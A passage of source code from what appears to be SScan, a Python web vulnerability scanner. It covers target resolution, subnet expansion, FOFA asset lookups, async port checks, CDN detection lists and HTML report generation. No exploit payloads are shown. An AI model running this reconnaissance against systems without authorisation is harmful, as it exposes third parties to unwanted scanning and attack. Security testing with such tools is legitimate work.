96 | ip_port_list.append((host, port, scheme, path, port))
97 | else:  # no port specified in the URL, scan 80 and 443
98 | port = 80
99 | ip_port_list.append((host, 80, scheme, path, 80))
100 | ip_port_list.append((host, 443, scheme, path, 443))
101 |
102 | # when scripts are not disabled, add the ports the plugins need to scan
103 | if not args.no_scripts:
104 | for s_port in args.require_ports:
105 | ip_port_list.append((host, s_port, scheme, path, port))
106 |
107 | return list(set(ip_port_list))
108 |
109 |
110 | # wrap the targets into a normalized format
111 | # {'127.0.0.1': {'scheme': 'http', 'host': '127.0.0.1', 'port': 80, 'path': '', 'ports_open': [80, 3306], 's_port': -1}
112 | def get_target(tasks, fofa_result):
113 | targets = {}
114 | for task in tasks:
115 | if task.result()[2] == 'open':
116 | host = task.result()[0]
117 | scheme = task.result()[3]
118 | path = task.result()[4]
119 | if host in targets:
120 | port = targets[host]['ports_open']
121 | port.append(task.result()[1])
122 | targets[host].update(ports_open=port)
123 | else:
124 | targets[host] = {'scheme': scheme, 'host': host, 'port': task.result()[5], 'path': path, 'ports_open': [task.result()[1]]}
125 |
126 | # handle the fofa results
127 | for _target in fofa_result:
128 | url = _target
129 | # scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
130 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
131 |
132 | # split the host and port out of the netloc
133 | host = netloc.split(':')[0]
134 | port = int(netloc.split(':')[1])
135 | if host in targets.keys() and (port == 80 or port == 443):
136 | pass
137 | else:
138 | fofa_target = {'scheme': scheme, 'host': netloc, 'port': port, 'path': path, 'ports_open': [port]}
139 | targets[netloc] = fofa_target
140 |
141 | return targets
142 |
143 |
144 | # use async coroutines to check whether ports 80, 443 and the given ports are open
145 | def process_targets(queue_targets, q_targets, args, fofa_result):
146 |
147 | sem = asyncio.Semaphore(1000)  # limit the concurrency
148 | # the main thread gets the current event loop via get_event_loop; other threads must call loop = new_event_loop() first and then set_event_loop(loop).
149 | loop = asyncio.new_event_loop()
150 | asyncio.set_event_loop(loop)
151 |
152 | # normalize the targets and the ports to be scanned
153 |
154 | # queue_targets ['http://127.0.0.1:8080', 'www.baidu.cn']
155 | # ip_port_list [('127.0.0.1', 8080, 0, 'http', ''), ('www.baidu.cn', 80, 0, 'unknown', ''), ('www.baidu.cn', 443, 0, 'unknown', '')]
156 | ip_port_list = get_ip_port_list(queue_targets, args)
157 |
158 | tasks = list()
159 |
160 | progress = Progress(
161 | "[progress.description]{task.description}",
162 | BarColumn(),
163 | "[progress.percentage]{task.percentage:>3.0f}%",
164 | TimeRemainingColumn(),
165 | "[bold red]{task.completed}/{task.total}",
166 | transient=True,  # hide the progress bar once it reaches 100%
167 | )
168 |
169 | # progress bar
170 | with progress:
171 | task = progress.add_task(f"[cyan]Start of port detection ...", total=len(queue_targets), start=False)
172 | try:
173 | for ip_port in ip_port_list:
174 | # port scan task
175 | tasks.append(loop.create_task(port_scan_check(ip_port, sem, progress, task)))
176 | except Exception as e:
177 | logger.log("ERROR", f'{e}')
178 |
179 | import platform
180 | if platform.system() != "Windows":
181 | import uvloop
182 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
183 | loop.run_until_complete(asyncio.wait(tasks))
184 | # close the event loop
185 | loop.close()
186 |
187 | # wrap the targets into a normalized format
188 | targets = get_target(tasks, fofa_result)
189 |
190 | for host in targets:
191 | target = targets[host]
192 | ports_open = target['ports_open']
193 | if 80 in ports_open and 443 in ports_open:
194 | target.update(port=443)
195 | target.update(scheme='https')
196 |
197 | elif 80 in ports_open:
198 | target.update(port=80)
199 | target.update(scheme='http')
200 | elif 443 in ports_open:
201 | target.update(port=443)
202 | target.update(scheme='https')
203 |
204 | if target['port'] in ports_open or 80 in ports_open or 443 in ports_open:
205 | target['has_http'] = True
206 | else:
207 | target['has_http'] = False
208 | # add the target to the final scan queue
209 | # {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [443, 80], 'has_http': True}
210 | q_targets.put(target)
211 |
212 | logger.log("DEBUG", f'Scan target details: {target}')
213 |
214 |
215 | # resolve the domain to IPs, check that the domain is valid, and keep valid URLs and IPs
216 | async def domain_lookup_check(loop, url, queue_targets, processed_targets):
217 | # convert ['https://jd.com'] into [('jd.com', 'https')]
218 | url = url.replace('\n', '').replace('\r', '').strip()
219 | if url.find('://') < 0:
220 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
221 | scheme = 'http'
222 | else:
223 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
224 | # host port
225 | if netloc.find(':') >= 0:
226 | _ = netloc.split(':')
227 | host = _[0]
228 | else:
229 | host = netloc
230 |
231 | # ('jd.com', 'https')
232 | url_tuple = (host, scheme)
233 | try:
234 | info = await loop.getaddrinfo(*url_tuple, proto=socket.IPPROTO_TCP,)
235 | queue_targets.append(url)
236 | for host in info:
237 | ip = host[4][0]
238 | # keep only the IP, in preparation for an explicit netmask
239 | processed_targets.append(ip)
240 | except Exception as e:
241 | logger.log("ERROR", f'Invalid domain: {url}')
242 | pass
243 |
244 |
245 | # pre-process URLs / IPs / domains and discover open ports
246 | def prepare_targets(target_list, q_targets, args):
247 | # valid targets, including URLs and IPs
248 | queue_targets = []
249 |
250 | # valid IPs; used to add extra targets when another netmask is specified
251 | processed_targets = []
252 |
253 | # resolve domains to IPs with async coroutines; roughly 20s for 7000 valid URLs
254 | loop = asyncio.get_event_loop()
255 | tasks = [loop.create_task(domain_lookup_check(loop, url, queue_targets, processed_targets)) for url in target_list]
256 | # speed up asyncio with uvloop (not supported on Windows yet)
257 | import platform
258 | if platform.system() != "Windows":
259 | import uvloop
260 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
261 | result = asyncio.gather(*tasks)
262 |
263 | loop.run_until_complete(result)
264 |
265 | loop.close()
266 |
267 | logger.log("DEBUG", f'Valid URLs: {queue_targets} and valid IPs: {processed_targets}')
268 |
269 | # post-process the target IPs and check whether they sit behind a CDN
270 | if args.checkcdn:
271 | processed_targets = check_cdn(target_list)
272 |
273 | logger.log("DEBUG", f'Targets without a CDN: {processed_targets}')
274 |
275 | # when a netmask is specified, add the IPs of the corresponding network segment to the targets
276 | if args.network != 32:
277 | for ip in processed_targets:
278 | if ip.find('/') > 0:  # this network has already been processed, e.g. 118.193.98/24
279 | continue
280 | _network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
281 | if _network in processed_targets:
282 | continue
283 | processed_targets.append(_network)
284 | if args.network >= 20:
285 | sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
286 | else:
287 | sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
288 |
289 | for sub_net in sub_nets:
290 | if sub_net in processed_targets:
291 | continue
292 | if type(sub_net) == ipaddress.IPv4Network: # add network only
293 | processed_targets.append(str(sub_net))
294 | for _ip in sub_net:
295 | _ip = str(_ip)
296 | if _ip not in processed_targets:
297 | queue_targets.append(_ip)
298 |
299 | # merge domains and IPs into the target list
300 | queue_targets.extend(processed_targets)
301 | # deduplicate
302 | queue_targets = set(queue_targets)
303 |
304 | # live web assets discovered by fofa
305 | fofa_result = []
306 |
307 | # when the fofa API is configured, search fofa for the queue_targets to widen the asset scope
308 | if fofaApi['email'] and fofaApi['key']:
309 | fofa_result = fmain(queue_targets)
310 | # fofa_result['http://127.0.0.1:3790', 'http://127.0.0.1:80', 'https://127.0.0.1:443']
311 |
312 | # use async coroutines to check whether ports 80, 443 and the given ports are open
313 | # check the targets' 80, 443 and given ports, normalize them, and put them into the scan queue q_targets
314 | process_targets(queue_targets, q_targets, args, fofa_result)
315 |
--------------------------------------------------------------------------------
/lib/common/connectionPool.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import requests
6 | from requests.adapters import HTTPAdapter
7 | from config import setting
8 | '''
9 | Connection pool
10 | HTTP runs on top of TCP: every HTTP request goes through the TCP three-way handshake,
11 | then sends the request, gets the response, and finally tears the TCP connection down.
12 | Doing this for every request (handshake, request, teardown) is wasteful, and even more so
13 | for HTTPS, where each request needs several extra packets before the connection is ready
14 | (4 more, not counting ACKs). If a TCP or HTTP connection can be kept open and reused for
15 | multiple transfers, a lot of resources are saved. That is the idea behind an "HTTP(S) connection pool".
16 | '''
17 |
18 |
19 | def conn_pool():
20 | session = requests.Session()
21 | session.keep_alive = False
22 | session.headers = setting.default_headers
23 | # create an adapter: pool_connections is the number of connection pools, pool_maxsize the maximum pool size, max_retries the number of retries on failure
24 | '''
25 | pool_connections – number of urllib3 connection pools to cache; this is the number of pools, not connections, and the default of 10 is usually enough.
26 | pool_maxsize – the maximum number of connections kept in each pool.
27 | max_retries (int) – maximum number of retries per connection, used only for DNS lookup failures, socket connection errors and connection timeouts.
28 | By default,
29 | requests does not retry failed connections; for fine-grained control over retry conditions, use urllib3's Retry class.
30 | pool_block – whether the connection pool should block for connections.
31 | '''
32 |
33 | adapter = HTTPAdapter(pool_connections=10, pool_maxsize=100, pool_block=False)
34 | # tell requests to use this adapter for both http and https
35 | session.mount('http://', adapter)
36 | session.mount('https://', adapter)
37 | # set verify to False, mainly to avoid certificate errors with HTTPS
38 | session.verify = False
39 |
40 | # user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'
41 | # user_agent = default_headers
42 |
43 | return session
44 |
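# A minimal usage sketch (assumed import path, placeholder URL):
#
#   from lib.common.connectionPool import conn_pool
#
#   session = conn_pool()
#   resp = session.get('http://example.com/robots.txt', timeout=10)
#   print(resp.status_code, len(resp.content))
#   session.close()   # release the pooled connections when done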
--------------------------------------------------------------------------------
/lib/common/consle_width.py:
--------------------------------------------------------------------------------
1 | """ getTerminalSize()
2 | - get width and height of console
3 | - works on linux,os x,windows,cygwin(windows)
4 | """
5 |
6 | __all__ = ['getTerminalSize']
7 | import os
8 |
9 |
10 | def getTerminalSize():
11 | import platform
12 | current_os = platform.system()
13 | tuple_xy = None
14 | if current_os == 'Windows':
15 | tuple_xy = _getTerminalSize_windows()
16 | if tuple_xy is None:
17 | tuple_xy = _getTerminalSize_tput()
18 | # needed for window's python in cygwin's xterm!
19 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
20 | tuple_xy = _getTerminalSize_linux()
21 | if tuple_xy is None:
22 | tuple_xy = (80, 25) # default value
23 | return tuple_xy
24 |
25 |
26 | def _getTerminalSize_windows():
27 | res = None
28 | try:
29 | from ctypes import windll, create_string_buffer
30 |
31 | # stdin handle is -10
32 | # stdout handle is -11
33 | # stderr handle is -12
34 |
35 | h = windll.kernel32.GetStdHandle(-12)
36 | csbi = create_string_buffer(22)
37 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
38 | except:
39 | return None
40 | if res:
41 | import struct
42 | (bufx, bufy, curx, cury, wattr,
43 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
44 | sizex = right - left + 1
45 | sizey = bottom - top + 1
46 | return sizex, sizey
47 | else:
48 | return None
49 |
50 |
51 | def _getTerminalSize_tput():
52 | # get terminal width
53 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
54 | try:
55 | import subprocess
56 | proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
57 | output = proc.communicate(input=None)
58 | cols = int(output[0])
59 | proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
60 | output = proc.communicate(input=None)
61 | rows = int(output[0])
62 | return (cols, rows)
63 | except:
64 | return None
65 |
66 |
67 | def _getTerminalSize_linux():
68 | def ioctl_GWINSZ(fd):
69 | try:
70 | import fcntl, termios, struct, os
71 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
72 | except:
73 | return None
74 | return cr
75 |
76 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
77 | if not cr:
78 | try:
79 | fd = os.open(os.ctermid(), os.O_RDONLY)
80 | cr = ioctl_GWINSZ(fd)
81 | os.close(fd)
82 | except:
83 | pass
84 | if not cr:
85 | try:
86 | env = os.environ
87 | cr = (env['LINES'], env['COLUMNS'])
88 | except:
89 | return None
90 | return int(cr[1]), int(cr[0])
91 |
92 |
93 | if __name__ == "__main__":
94 | sizex, sizey = getTerminalSize()
95 | print('width =', sizex, 'height =', sizey)
96 |
97 |
98 |
--------------------------------------------------------------------------------
/lib/common/report.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | # report template
3 |
4 | import time
5 | from string import Template
6 | import webbrowser
7 | import sys
8 | import errno
9 | import codecs
10 | import os
11 | from lib.common.utils import escape
12 | from lib.common.consle_width import getTerminalSize
13 | from config import setting
14 | from config.log import logger
15 | from config.banner import version
16 | # template for html
17 |
18 | html_general = """
19 |
20 |
21 | SScan ${version} Scan Report
22 |
23 |
35 |
36 |
37 | Scanned ${tasks_processed_count} targets in
38 | ${cost_min} ${cost_seconds} seconds .
39 | ${vulnerable_hosts_count} vulnerable hosts found in total.
40 | ${content}
41 |
42 |
43 | """
44 |
45 | html_host = """
46 | ${host}
47 |
50 | """
51 |
52 | html_list_item = """
53 | ${status} ${vul_type} ${title} ${url}
54 | """
55 |
56 | html = {
57 | 'general': html_general,
58 | 'host': html_host,
59 | 'list_item': html_list_item,
60 | 'suffix': '.html'
61 | }
62 |
63 |
64 | # template for markdown
65 | markdown_general = """
66 | # BBScan Scan Report
67 | Version: v 1.5
68 | Num of targets: ${tasks_processed_count}
69 | Num of vulnerable hosts: ${vulnerable_hosts_count}
70 | Time cost: ${cost_min} ${cost_seconds} seconds
71 | ${content}
72 | """
73 |
74 | markdown_host = """
75 | ## ${host}
76 | ${list}
77 | """
78 |
79 | markdown_list_item = """* [${status}] ${title} ${url}
80 | """
81 |
82 | markdown = {
83 | 'general': markdown_general,
84 | 'host': markdown_host,
85 | 'list_item': markdown_list_item,
86 | 'suffix': '.md'
87 | }
88 |
89 |
90 | # summary
91 | template = {
92 | 'html': html,
93 | }
94 |
95 |
96 | def save_report(args, _q_results, _file, tasks_processed_count):
97 |
98 | open_browser = args.browser
99 | start_time = time.time()
100 | a_template = template['html']
101 | t_general = Template(a_template['general'])
102 | t_host = Template(a_template['host'])
103 | t_list_item = Template(a_template['list_item'])
104 | output_file_suffix = a_template['suffix']
105 | report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
106 | time.strftime('%Y%m%d_%H%M%S', time.localtime()),
107 | output_file_suffix)
108 |
109 | html_doc = content = ""
110 | vulnerable_hosts_count = 0
111 | console_width = getTerminalSize()[0] - 2
112 |
113 | try:
114 | while not setting.stop_me or _q_results.qsize() > 0:
115 | if _q_results.qsize() == 0:
116 | time.sleep(0.1)
117 | continue
118 |
119 | while _q_results.qsize() > 0:
120 | item = _q_results.get()
121 | if type(item) is str:
122 | message = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), item)
123 | if args.network <= 22 and (item.startswith('Scan ') or item.startswith('No ports open')):
124 | sys.stdout.write(message + (console_width - len(message)) * ' ' + '\r')
125 | else:
126 | logger.log('INFOR', f"{message}")
127 | continue
128 | host, results = item
129 | vulnerable_hosts_count += 1
130 |
131 | # print
132 | for key in results.keys():
133 | for url in results[key]:
134 | logger.log('INFOR', f"[+]{url['status'] if url['status'] else ''} {url['url']}")
135 |
136 | _str = ""
137 | for key in results.keys():
138 | for _ in results[key]:
139 | _str += t_list_item.substitute(
140 | {'status': ' [%s]' % _['status'] if _['status'] else '',
141 | 'url': _['url'],
142 | 'title': '[%s]' % _['title'] if _['title'] else '',
143 | 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
144 | )
145 | _str = t_host.substitute({'host': host, 'list': _str})
146 | content += _str
147 |
148 | cost_time = time.time() - start_time
149 | cost_min = int(cost_time / 60)
150 | cost_min = '%s min' % cost_min if cost_min > 0 else ''
151 | cost_seconds = '%.2f' % (cost_time % 60)
152 |
153 | html_doc = t_general.substitute({
154 | 'version': version,
155 | 'tasks_processed_count': tasks_processed_count,
156 | 'vulnerable_hosts_count': vulnerable_hosts_count,
157 | 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content
158 | })
159 |
160 | with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
161 | outFile.write(html_doc)
162 |
163 | # if config.ports_saved_to_file:
164 | # print('* Ports data saved to %s' % args.save_ports)
165 |
166 | if html_doc:
167 |
168 | cost_time = time.time() - start_time
169 | cost_min = int(cost_time / 60)
170 | cost_min = '%s min' % cost_min if cost_min > 0 else ''
171 | cost_seconds = '%.1f' % (cost_time % 60)
172 |
173 | html_doc = t_general.substitute({
174 | 'version': version,
175 | 'tasks_processed_count': tasks_processed_count,
176 | 'vulnerable_hosts_count': vulnerable_hosts_count,
177 | 'cost_min': cost_min,
178 | 'cost_seconds': cost_seconds,
179 | 'content': content
180 | })
181 |
182 | with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
183 | outFile.write(html_doc)
184 |
185 | time.sleep(1.0)
186 |
187 | logger.log('INFOR', '* %s vulnerable targets on sites in total.' % vulnerable_hosts_count)
188 | logger.log('INFOR', '* Scan report saved to report/%s' % report_name)
189 | if open_browser:
190 | webbrowser.open_new_tab('file:///' + os.path.abspath('report/%s' % report_name))
191 | else:
192 | logger.log('INFOR', '* No vulnerabilities found on sites in %s.' % _file)
193 |
194 | except IOError as e:
195 | if e.errno == errno.EPIPE:
196 | sys.exit(-1)
197 | except Exception as e:
198 | logger.log('ERROR', '[save_report_thread Exception] %s %s' % (type(e), str(e)))
199 | import traceback
200 | traceback.print_exc()
201 | sys.exit(-1)
202 |
--------------------------------------------------------------------------------
/lib/common/utils.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 | import re
5 | import json
6 | from ipaddress import IPv4Address
7 | from urllib.parse import urlparse
8 | import hashlib
9 | from config.log import logger
10 | from config.setting import fofaApi, default_headers
11 | import requests
12 | import sys
13 |
14 |
15 | # do not print an ugly traceback when exiting with ctrl-c
16 | def ctrl_quit(_sig, _frame):
17 | sys.exit()
18 |
19 |
20 | def check_fofa():
21 | # when the fofa API is configured, check that the API is usable
22 | if fofaApi['email'] and fofaApi['key']:
23 | email = fofaApi['email']
24 | key = fofaApi['key']
25 | url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
26 | try:
27 | status = requests.get(url, headers=default_headers, timeout=10, verify=False).status_code
28 | if status != 200:
29 | logger.log('ALERT', f'Please set fofaApi in config/setting.py to your own API credentials')
30 | exit(-1)
31 | except requests.exceptions.ReadTimeout as e:
32 | logger.log('ERROR', f'Request timed out {e}')
33 | exit(-1)
34 | except requests.exceptions.ConnectionError as e:
35 | logger.log('ERROR', f'Connection error {e}')
36 | exit(-1)
37 |
38 |
39 | def ip_to_int(ip):
40 | if isinstance(ip, int):
41 | return ip
42 | try:
43 | ipv4 = IPv4Address(ip)
44 | except Exception as e:
45 | logger.log('ERROR', repr(e))
46 | return 0
47 | return int(ipv4)
48 |
49 |
50 | def load_json(path):
51 | with open(path) as fp:
52 | return json.load(fp)
53 |
54 |
55 | def clear_queue(this_queue):
56 | try:
57 | while True:
58 | this_queue.get_nowait()
59 | except Exception as e:
60 | return
61 |
62 |
63 | # compute the md5 of a page; comparing md5 values tells whether two pages are identical
64 | def get_md5(resp, headers):
65 | html_doc = get_html(headers, resp)
66 | return hashlib.md5(html_doc.encode('utf-8')).hexdigest()
67 |
68 |
69 | def get_html(headers, resp):
70 | if headers.get('content-type', '').find('text') >= 0 \
71 | or headers.get('content-type', '').find('html') >= 0 \
72 | or int(headers.get('content-length', '0')) <= 20480: # 1024 * 20
73 | # decode properly to avoid garbled (non-UTF-8) content
74 | html_doc = decode_response_text(resp.content)
75 | else:
76 | html_doc = ''
77 | return html_doc
78 |
79 |
80 | # decode the response to avoid garbled (non-UTF-8) content
81 | def decode_response_text(txt, charset=None):
82 | if charset:
83 | try:
84 | return txt.decode(charset)
85 | except Exception as e:
86 | pass
87 | for _ in ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']:
88 | try:
89 | return txt.decode(_)
90 | except Exception as e:
91 | pass
92 | try:
93 | return txt.decode('ascii', 'ignore')
94 | except Exception as e:
95 | pass
96 | raise Exception('Fail to decode response Text')
97 |
98 |
99 | def get_domain_sub(host):
100 | if re.search(r'\d+\.\d+\.\d+\.\d+', host.split(':')[0]):
101 | return ''
102 | else:
103 | return host.split('.')[0]
104 |
105 |
106 | def save_script_result(self, status, url, title, vul_type=''):
107 | if url not in self.results:
108 | self.results[url] = []
109 | _ = {'status': status, 'url': url, 'title': title, 'vul_type': vul_type}
110 |
111 | self.results[url].append(_)
112 |
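# Illustrative call with hypothetical values, as a plugin script might use it:
#   save_script_result(self, '200', 'http://1.2.3.4:9200', '', 'unauthorized_access_elasticsearch')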
113 |
114 | def escape(html):
115 | return html.replace('&', '&amp;').\
116 | replace('<', '&lt;').replace('>', '&gt;').\
117 | replace('"', '&quot;').replace("'", '&#39;')
118 |
119 |
120 | # check whether a port is open
121 | # host: www.baidu.com or an IP
122 | # def is_port_open(host, port):
123 | # try:
124 | # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
125 | # s.settimeout(3.0)
126 | # if s.connect_ex((host, int(port))) == 0:
127 | # return True
128 | # else:
129 | # return False
130 | # except Exception as e:
131 | # logger.log('ERROR', f'{repr(e)}')
132 | # return False
133 | # finally:
134 | # try:
135 | # # close the TCP connection
136 | # s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
137 | # s.close()
138 | # except Exception as e:
139 | # pass
140 |
141 | # def scan_given_ports(confirmed_open, confirmed_closed, host, ports):
142 | # checked_ports = confirmed_open.union(confirmed_closed)
143 | # ports_open = set()
144 | # ports_closed = set()
145 | #
146 | # for port in ports:
147 | # if port in checked_ports:  # do not re-check ports that were already confirmed
148 | # continue
149 | # if is_port_open(host, port):
150 | # ports_open.add(port)
151 | # else:
152 | # ports_closed.add(port)
153 | #
154 | # return ports_open.union(confirmed_open), ports_closed.union(confirmed_closed)
155 |
156 |
157 | # compute the depth of the given URL, return a tuple (URL, depth)
158 | def cal_depth(self, url):
159 | if url.find('#') >= 0:
160 | url = url[:url.find('#')] # cut off fragment
161 | if url.find('?') >= 0:
162 | url = url[:url.find('?')] # cut off query string
163 |
164 | # in the following three cases the link is not on the current domain or has no HTTP service, so it is not queued
165 | if url.startswith('//'):
166 | return '', 10000 # //www.baidu.com/index.php
167 |
168 | if not urlparse(url, 'http').scheme.startswith('http'):
169 | return '', 10000 # no HTTP protocol
170 |
171 | if url.lower().startswith('http'):
172 | _ = urlparse(url, 'http')
173 | if _.netloc == self.host: # same hostname
174 | url = _.path
175 | else:
176 | return '', 10000 # not the same hostname
177 |
178 | while url.find('//') >= 0:
179 | url = url.replace('//', '/')
180 |
181 | if not url:
182 | return '/', 1 # http://www.example.com
183 |
184 | if url[0] != '/':
185 | url = '/' + url
186 |
187 | url = url[: url.rfind('/') + 1]
188 |
189 | if url.split('/')[-2].find('.') > 0:
190 | url = '/'.join(url.split('/')[:-2]) + '/'
191 |
192 | depth = url.count('/')
193 | return url, depth
194 |
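# Illustrative inputs/outputs, assuming self.host == 'www.example.com':
#   cal_depth(self, 'http://www.example.com/a/b/index.php')  ->  ('/a/b/', 3)
#   cal_depth(self, 'https://other.com/x/')                  ->  ('', 10000)  # different host, skipped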
195 |
196 | # # convert ['https://jd.com'] into [('jd.com', 'https')]
197 | # def format_url(urls):
198 | #
199 | # format_url = []
200 | # for url in urls:
201 | # url = url.replace('\n', '').replace('\r', '').strip()
202 | # if url.find('://') < 0:
203 | # netloc = url[:url.find('/')] if url.find('/') > 0 else url
204 | # scheme = 'http'
205 | # else:
206 | # scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
207 | # # host port
208 | # if netloc.find(':') >= 0:
209 | # _ = netloc.split(':')
210 | # host = _[0]
211 | # else:
212 | # host = netloc
213 | # url_tuple = (url, scheme)
214 | # format_url.append(url_tuple)
215 | # print(format_url)
216 | # return format_url
217 |
--------------------------------------------------------------------------------
/lib/data/GeoLite2-ASN.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/lib/data/GeoLite2-ASN.mmdb
--------------------------------------------------------------------------------
/lib/data/cdn_asn_list.json:
--------------------------------------------------------------------------------
1 | [
2 | "10576",
3 | "10762",
4 | "11748",
5 | "131099",
6 | "132601",
7 | "133496",
8 | "134409",
9 | "135295",
10 | "136764",
11 | "137187",
12 | "13777",
13 | "13890",
14 | "14103",
15 | "14520",
16 | "17132",
17 | "199251",
18 | "200013",
19 | "200325",
20 | "200856",
21 | "201263",
22 | "202294",
23 | "203075",
24 | "203139",
25 | "204248",
26 | "204286",
27 | "204545",
28 | "206227",
29 | "206734",
30 | "206848",
31 | "206986",
32 | "207158",
33 | "208559",
34 | "209403",
35 | "21030",
36 | "21257",
37 | "23327",
38 | "23393",
39 | "23637",
40 | "23794",
41 | "24997",
42 | "26492",
43 | "268843",
44 | "28709",
45 | "29264",
46 | "30282",
47 | "30637",
48 | "328126",
49 | "36408",
50 | "38107",
51 | "397192",
52 | "40366",
53 | "43303",
54 | "44907",
55 | "46071",
56 | "46177",
57 | "47542",
58 | "49287",
59 | "49689",
60 | "51286",
61 | "55082",
62 | "55254",
63 | "56636",
64 | "57363",
65 | "58127",
66 | "59730",
67 | "59776",
68 | "60068",
69 | "60626",
70 | "60922",
71 | "61107",
72 | "61159",
73 | "62026",
74 | "62229",
75 | "63062",
76 | "64232",
77 | "8868",
78 | "9053",
79 | "55770",
80 | "49846",
81 | "49249",
82 | "48163",
83 | "45700",
84 | "43639",
85 | "39836",
86 | "393560",
87 | "393234",
88 | "36183",
89 | "35994",
90 | "35993",
91 | "35204",
92 | "34850",
93 | "34164",
94 | "33905",
95 | "32787",
96 | "31377",
97 | "31110",
98 | "31109",
99 | "31108",
100 | "31107",
101 | "30675",
102 | "24319",
103 | "23903",
104 | "23455",
105 | "23454",
106 | "22207",
107 | "21399",
108 | "21357",
109 | "21342",
110 | "20940",
111 | "20189",
112 | "18717",
113 | "18680",
114 | "17334",
115 | "16702",
116 | "16625",
117 | "12222",
118 | "209101",
119 | "201585",
120 | "135429",
121 | "395747",
122 | "394536",
123 | "209242",
124 | "203898",
125 | "202623",
126 | "14789",
127 | "133877",
128 | "13335",
129 | "132892",
130 | "21859",
131 | "6185",
132 | "47823",
133 | "4134"
134 | ]
--------------------------------------------------------------------------------
/lib/data/cdn_cname_keywords.json:
--------------------------------------------------------------------------------
1 | {
2 | "cdn": "cdn",
3 | "cache": "cache",
4 | "tbcache.com": "Alibaba Cloud",
5 | "alicdn.com": "Alibaba Cloud",
6 | "tcdn.qq.com": "tcdn.qq.com",
7 | "00cdn.com": "XYcdn",
8 | "21cvcdn.com": "21Vianet",
9 | "21okglb.cn": "21Vianet",
10 | "21speedcdn.com": "21Vianet",
11 | "21vianet.com.cn": "21Vianet",
12 | "21vokglb.cn": "21Vianet",
13 | "360wzb.com": "360",
14 | "51cdn.com": "ChinaCache",
15 | "acadn.com": "Dnion",
16 | "aicdn.com": "UPYUN",
17 | "akadns.net": "Akamai",
18 | "akamai-staging.net": "Akamai",
19 | "akamai.com": "Akamai",
20 | "akamai.net": "Akamai",
21 | "akamaitech.net": "Akamai",
22 | "akamaized.net": "Akamai",
23 | "alicloudlayer.com": "ALiyun",
24 | "alikunlun.com": "ALiyun",
25 | "aliyun-inc.com": "ALiyun",
26 | "alicloudsec.com": "ALiyun",
27 | "aliyuncs.com": "ALiyun",
28 | "amazonaws.com": "Amazon Cloudfront",
29 | "anankecdn.com.br": "Ananke",
30 | "aodianyun.com": "VOD",
31 | "aqb.so": "AnQuanBao",
32 | "awsdns": "KeyCDN",
33 | "azioncdn.net": "Azion",
34 | "azureedge.net": "Azure CDN",
35 | "bdydns.com": "Baiduyun",
36 | "bitgravity.com": "Tata Communications",
37 | "cachecn.com": "CnKuai",
38 | "cachefly.net": "Cachefly",
39 | "ccgslb.com": "ChinaCache",
40 | "ccgslb.net": "ChinaCache",
41 | "ccgslb.com.cn": "ChinaCache",
42 | "cdn-cdn.net": "",
43 | "cdn.cloudflare.net": "CloudFlare",
44 | "cdn.dnsv1.com": "Tengxunyun",
45 | "cdn.ngenix.net": "",
46 | "cdn20.com": "ChinaCache",
47 | "cdn77.net": "CDN77",
48 | "cdn77.org": "CDN77",
49 | "cdnetworks.net": "CDNetworks",
50 | "cdnify.io": "CDNify",
51 | "cdnnetworks.com": "CDNetworks",
52 | "cdnsun.net": "CDNsun",
53 | "cdntip.com": "QCloud",
54 | "cdnudns.com": "PowerLeader",
55 | "cdnvideo.ru": "CDNvideo",
56 | "cdnzz.net": "SuZhi",
57 | "chinacache.net": "ChinaCache",
58 | "chinaidns.net": "LineFuture",
59 | "chinanetcenter.com": "ChinaCache",
60 | "cloudcdn.net": "CnKuai",
61 | "cloudfront.net": "Amazon Cloudfront",
62 | "customcdn.cn": "ChinaCache",
63 | "customcdn.com": "ChinaCache",
64 | "dnion.com": "Dnion",
65 | "dnspao.com": "",
66 | "edgecastcdn.net": "EdgeCast",
67 | "edgesuite.net": "Akamai",
68 | "ewcache.com": "Dnion",
69 | "fastcache.com": "FastCache",
